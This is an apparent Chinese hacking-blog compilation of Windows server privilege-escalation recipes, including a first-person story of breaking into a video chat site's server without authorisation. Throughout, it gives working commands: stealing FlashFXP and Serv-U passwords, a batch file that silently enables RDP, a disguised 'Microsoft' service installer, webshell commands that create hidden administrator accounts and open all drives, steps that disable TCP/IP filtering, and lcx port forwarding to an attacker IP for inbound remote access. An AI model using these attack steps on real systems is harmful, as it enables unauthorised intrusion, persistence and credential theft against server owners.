From:http://hi.baidu.com/ymhacker/blog/item/fce947e997c50034b90e2dad.html
flashfxp提权
重点将对方的.dat文件全部弄下来。。。然后揽权
具体是这三个文件
quick.dat
Sites.dat
Stats.dat
然后就是快速连接,,接着用passlook来查看对方的密码。。
=====================================================================================================================
serv-u没有权限查看的情况下
asp直接揽权
上传一个aspx的木马,,然后提权。。前提是默认密码没有改动,并且服务器直持aspx的解析
asp可以直接提权的情况下。可以执行很多种方法的
如果可以将对方的serv-uadmin给下载下来。。然后查看对方的密码。。再在提权也是不错的
winhex改的是serv-admin
利用winhex查看localadministrators
首先是改了密码没改账户的情况。我们可以直接用UE打开ServUAdmin.exe,搜索账户“LocalAdministrator”
紧着着账户后面的字符串就是密码。
一般是这样的格式:LocalAdministrator.password.Globl……,其中Password就是我们需要的密码了。
======
工具读取的是serv-demon.exe的密码
=========================================================================================
webshell开启3389
对于serv-u 6.3直接揽权是不能够成功的..要用aspx版的…
当然只要这种serv-u可以直接在线提权的..那么.我们可以直接用serv-u来进行提权
3389.bat 来开启对方的3389
内容如下
echo Windows Registry Editor Version 5.00>>C:\RECYCLER\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>C:\RECYCLER\3389.reg
echo “fDenyTSConnections”=dword:00000000>>C:\RECYCLER\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>C:\RECYCLER\3389.reg
echo “PortNumber”=dword:00000d3d>>C:\RECYCLER\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>C:\RECYCLER\3389.reg
echo “PortNumber”=dword:00000d3d>>C:\RECYCLER\3389.reg
regedit /s C:\RECYCLER\3389.reg
===============================================================================================
教你如何开3389端口的多种方法!
首先我们制作开启3389的工具
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
“Enabled”=”0″
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“ShutdownWithoutLogon”=”0″
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
“EnableAdminTSRemote”=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
“TSEnabled”=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
“Start”=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
“Hotkey”=”1″
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
“Start”=dword:00000002
“ErrorControl”=dword:00000001
“ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
“ObjectName”=”LocalSystem”
“Type”=dword:00000010
“Description”=”Microsoft”
“DisplayName”=”Microsoft”
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
=======================================================================================
从上传webshell到突破TCP/IP筛选到3389终端登陆
作者:未知 文章来源:本站整理 点击数: 30 更新时间:2007-1-7 19:31:39
一:得到webshell
今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了……….
一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。
今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~
突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去……….更加郁闷了!:(
想想反正也是没有事情做,测试一下主机安全做的怎么样吧,呵呵(太菜,说测试人家安全实在是抬高自己了)
在cmd下ping了一下得到了对方的ip,然后登陆http://whois.webhosting.info/对方ip看看有没有其他的站点,哈,这下发了,上面有几十个
站点,估计我还是能找到一个两个带漏洞的站点的`
经过漫长的查找,终于找到一个动易带漏洞的页面http://www.xxxx.net/Upfile_Soft.asp,上传一个webshell(海阳2005正式版)先(怎么上
传我就不罗嗦了,上传工具现在漫天飘了)。
二:成功提升权限建立用户
拿到webshell后高高兴兴的登陆了,突然发现什么权限都没有,只能在自己的webshell所在的目录里面打转(c.d.e.f盘都浏览不了),连删除
文件的权限都没有,郁闷呀……..
回到〖Server〗下看看主机开了什么服务吧,经过发现他开了终端服务和serv-u服务,哈,这下有搞头了^_^用superscan扫描了一下他的ip,
果然通过banner看出他是用的serv-u,版本5.0。
到〖Wscript.Shell〗下面试试看能执行cmd命令不能,输入net user后没有反映,再试通过Wscript.Shell能执行cmd命令不能,再次输入net
user后执行返回了对方的user名单,哈哈,这下好了,能拿下了!!
上传serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目录下面,改名为:test.exe,然后回到〖Wscript.Shell〗下执行命令去了,嘿
嘿,马上一只肥鸡就要到手了,高兴ing~
通过Wscript.Shell执行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe “net user guest /active:yes” #激活guest账号,我喜欢用这个账号
D:\a004\tggtwe\****.com\UploadSoft\test.exe “net user guest lvhuana” #把guest账号的密码设定为lvhuana
D:\a004\tggtwe\****.com\UploadSoft\test.exe “net localgroup administrators guest /add” #提升guest权限到admin权限
好了,账号建立完毕,执行一下net localgroup administrators看看成功没,通过回显知道添加成功了。然后执行netstat -an后看到他开的
终端端口是默认的3389,OK,连接试试~
三:解决TCP/IP筛选
连接不上!?晕………..再拿出superscan来扫一下他的3389,根本扫不到……..(开了防火墙!?靠,我的点真背…..)
没有办法了,再次回到Wscript.Shell执行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe c: /e /t /g everyone:F” #把c盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe d: /e /t /g everyone:F” #把d盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe e: /e /t /g everyone:F” #把e盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe f: /e /t /g everyone:F” #把f盘设置为everyone可以浏览
这下最少可以遍历整个硬盘了,我在硬盘里面到处的翻,找遍了也没有找到他的防火墙文件,这下心里有数了,肯定是他进行TCP/IP筛选了!
(当然也有是内网做服务器的可能,具体大家自己可以根据ipconfig -all来判断)
突破TCP/IP筛选我们可以更改他的注册表来实现,我们要做的就是导出他注册表的三处,更改后再导入就可以了,回到〖Wscript.Shell〗执行
cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip” #导出注册表里关于TCP/IP筛选的第一处
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -e D:\a004\tggtwe\****.com\UploadSoft\2.reg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip” #导出注册表里关于TCP/IP筛选的第二处
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -e D:\a004\tggtwe\****.com\UploadSoft\3.reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip” #导出注册表里关于TCP/IP筛选的第三处
然后回到〖Stream〗或〖FSO〗发现1.reg,2.reg,3.reg已经安静的躺在那里了,嘿嘿~
把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,把关于TCP/IP筛选的几个地方改一下,首先打开1.reg找
到”EnableSecurityFilters”=dword:00000001把最后面的数字1改成0后保存,然后更改2.reg,3.reg,更改方法一样,我就不再罗嗦了~
然后我们把1.reg,2.reg,3.reg再上传回对方的机器里面(这里我们要选上覆盖模式,因为没有权限删除原来的1.reg,2.reg,3.reg),上传成
功后再回到〖Wscript.Shell〗执行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -s D:\a004\tggtwe\****.com\UploadSoft\1.reg” #安静模式下把我们修改完的
1.reg导入到他的注册表
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -s D:\a004\tggtwe\****.com\UploadSoft\2.reg” #安静模式下把我们修改完的
2.reg导入到他的注册表
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -s D:\a004\tggtwe\****.com\UploadSoft\3.reg” #安静模式下把我们修改完的
3.reg导入到他的注册表
OK!导入后重新启动他的机器后在能解决TCP/IP筛选问题,再在〖Wscript.Shell〗执行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe “iisreset /reboot /timeout:00″ #利用他自身的iis服务来重新启动他的机
器,/timeout:00这个参数是让他立即重新启动
执行完后我们再用superscan已经扫不到他了,吼吼~已经重新启动了!
四:成功用终端登陆
经过漫长的等待后(其实时间不长,只是我在这里已经等不及了,嘿嘿~),终于可以用superscan扫到他了,并且可以扫到他的3389端口了,
哈哈,终于成功了,拿出终端登陆器顺利的用我刚才建立的user:guest,pass:lvhuana登陆上了!
好了,这篇垃圾文章到此就该结束了,已经凌晨了,也该收工睡觉了~由于本人太菜,错误地方肯定在所难免,让大家见笑了,同时望大家指正
!
==================================================================================================
服务器配置的过程中是要重起的…tcp/ip筛选的配置
去掉tcp/ip筛选限制的思路
TCP/IP筛选在注册表里有三处,分别是:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
然后把 三个文件里的EnableSecurityFilters”=dWord:00000001,改成EnableSecurityFilters”=dword:00000000
再将以上三个文件分别用
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
导入注册表即可
===================================================================================
服务器去除浏览限制
三:解决TCP/IP筛选
连接不上!?晕………..再拿出superscan来扫一下他的3389,根本扫不到……..(开了防火墙!?靠,我的点真背…..)
没有办法了,再次回到Wscript.Shell执行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe c: /e /t /g everyone:F” #把c盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe d: /e /t /g everyone:F” #把d盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe e: /e /t /g everyone:F” #把e盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe f: /e /t /g everyone:F” #把f盘设置为everyone可以浏览
===================================================================================
4899提权大法
这种的只能用serv-u.exe或者用1.aspx来进行提权,而不能直接在那个框框提交,不然是不会成功的
c:\ftp.exe “c:\aaa.reg”
c:\ftp.exe “c:\admdll.dll”
c:\ftp.exe “c:\raddrv.dll”
c:\ftp.exe “c:\r_server.exe”
C:\RECYCLER\aaa.reg
C:\RECYCLER\admdll.dll
C:\RECYCLER\raddrv.dll
C:\RECYCLER\r_server.exe
r_server.exe /port:4899 /pass:123456 /save /silence
=================================================================================
serv-u有修改权限提权
d:\Program Files\Serv-U\ServUDaemon.ini
Domain1=0.0.0.0||21|ttttttt|1|0|0
[Domain1]
User1=tianya520|1|0
[USER=tianya520|1]
Password=bi03295E0289695A0EC4BF4D8878F30BC7
HomeDir=c:\
TimeOut=600
Maintenance=System
Note1=”Wizard generated account”
Access1=C:\|RWAMELCDP
===
[Domain2]
User1=tianyazjq|1|0
[USER=tianyazjq|2]
Password=bi03295E0289695A0EC4BF4D8878F30BC7
HomeDir=c:\
PasswordLastChange=1183270123
TimeOut=600
Access1=C:\|RWAMELCDP
以下的不用
[DOMAINS]
Domain1=192.168.3.128||21|100|2|0|0
c:\winnt\system32\inetsrv\data\
quote site exec net user tianya$ 1314520 /add
quote site exec net localgroup administrators tianya$ /add
6.3
[GLOBAL]
Version=6.3.0.0
PacketTimeOut=300
UseUPnP=0
ProcessID=4016
[Domain1]
User1=tianya520|1|0
[USER=tianya520|1]
Password=bi03295E0289695A0EC4BF4D8878F30BC7
HomeDir=c:\
TimeOut=600
Maintenance=System
Note1=”Wizard generated account”
Access1=C:\|RWAMELCDP[DOMAINS]
Domain1=192.168.3.128||21|100|2|0|0
将domain2以下替换也可以1314520
[Domain2]
User1=tianya520|1|0
User2=wokao|1|0
[USER=tianya520|2]
Password=mh145ECC36D9B3A24553FBEA44539BF53C
HomeDir=c:\
PasswordLastChange=1183270824
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
[USER=wokao|2]
Password=evF73373D1DD342F450526DF7AF5AF0356
HomeDir=c:\
PasswordLastChange=1183271173
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
=================================
[Domain2]
User1=test100|1|0
[USER=test100|2]
Password=qe5827CFDF302C0BCE780CE9C28AED63C5
HomeDir=c:\
PasswordLastChange=1183271629
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
501 Cannot EXEC command line (error=2).
对方将cmd.exe 及 net user 移走
net.exe
net1.exe
quote site exec net1 user ffffff 1314520 /add
=================================================================================
lcx+radmin内网提权
首先在本地监听端口
lcx -listen 9200 9800
好了
在肉鸡上运行radmin,这里我已经运行了,下面用lcx端口映射
本机ip:60.176.26.20
60.176.26.20
的确是本机的ip,这就是ip映射的神奇
肉鸡ip:192.168.1.2
执行 lcx -slave 60.176.26.20 9200 192.168.1.2 4899
呵呵有反映了吧,好我们用radmin连接本机的9800,
看到了把,不是本机的画面哦,
3389
本地 lcx -listen 51 3800
对方 lcx -slave 121.34.63.48 51 对方内网ip 3389
d:\RECYCLER\su.exe “lcx -slave 121.34.63.48 51 192.168.17.252 3389″
本文还暂无回复